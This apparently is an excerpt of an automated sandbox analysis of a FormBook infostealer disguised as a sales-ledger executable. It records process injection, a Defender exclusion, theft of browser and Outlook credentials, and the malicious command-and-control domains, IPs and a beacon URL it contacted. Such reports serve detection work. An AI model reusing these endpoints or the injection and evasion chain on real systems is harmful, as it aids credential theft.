Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread, 9_2_0040A272
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000018.00000002.373722218.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.373557469.0000000000CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.315244915.0000000003959000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.310361553.0000000003B6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.Require your Sales Ledger from 01-April-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385451 Sample: Require your Sales Ledger f... Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 57 www.soretyje.com 2->57 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 13 other signatures 2->67 10 Require your Sales Ledger from 01-April-2020.exe 6 2->10         started        signatures3 process4 file5 49 Require your Sales...m 01-April-2020.exe, PE32 10->49 dropped 51 Require your Sales...exe:Zone.Identifier, ASCII 10->51 dropped 53 Require your Sales...-April-2020.exe.log, ASCII 10->53 dropped 55 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 10->55 dropped 81 Adds a directory exclusion to Windows Defender 10->81 14 Require your Sales Ledger from 01-April-2020.exe 10->14         started        17 AdvancedRun.exe 1 10->17         started        19 powershell.exe 26 10->19         started        21 AdvancedRun.exe 1 10->21         started        signatures6 process7 signatures8 83 Modifies the context of a thread in another process (thread injection) 14->83 85 Maps a DLL or memory area into another process 14->85 87 Sample uses process hollowing technique 14->87 89 Queues an APC in another process (thread injection) 14->89 23 explorer.exe 14->23 injected 27 AdvancedRun.exe 17->27         started        29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        33 AdvancedRun.exe 21->33         started        process9 dnsIp10 59 www.seniorlivingcaelderly.com 185.53.179.90, 49737, 49738, 49739 TEAMINTERNET-ASDE Germany 23->59 77 System process connects to network (likely due to code injection or exploit) 23->77 35 cmmon32.exe 23->35         started        signatures11 process12 file13 43 C:\Users\user\AppData\...\28Llogrv.ini, data 35->43 dropped 45 C:\Users\user\AppData\...\28Llogri.ini, data 35->45 dropped 69 Detected FormBook malware 35->69 71 Tries to steal Mail credentials (via file access) 35->71 73 Tries to harvest and steal browser information (history, passwords, etc) 35->73 75 3 other signatures 35->75 39 cmd.exe 35->39         started        signatures14 process15 file16 47 C:\Users\user\AppData\Local\Temp\DB1, SQLite 39->47 dropped 79 Tries to harvest and steal browser information (history, passwords, etc) 39->79 signatures17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.53.179.90
 www.seniorlivingcaelderly.com Germany
61969 TEAMINTERNET-ASDE true

Contacted Domains

Name IP Active
www.soretyje.com 81.17.18.194 true
www.seniorlivingcaelderly.com 185.53.179.90 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.seniorlivingcaelderly.com/suod/ true
  • Avira URL Cloud: safe
 unknown
http://www.seniorlivingcaelderly.com/suod/?RL0=uVgD4bu0-2R4Or&Sxo=LsHPYRuctkoWulzKyGbvgGfg2m0Ehvoa2gaw5h/iu275rsWI7O6TvqToE0BPOi46d4K3 true
  • Avira URL Cloud: safe
 unknown
www.consultoramulticars.com/suod/ true
  • Avira URL Cloud: safe
 low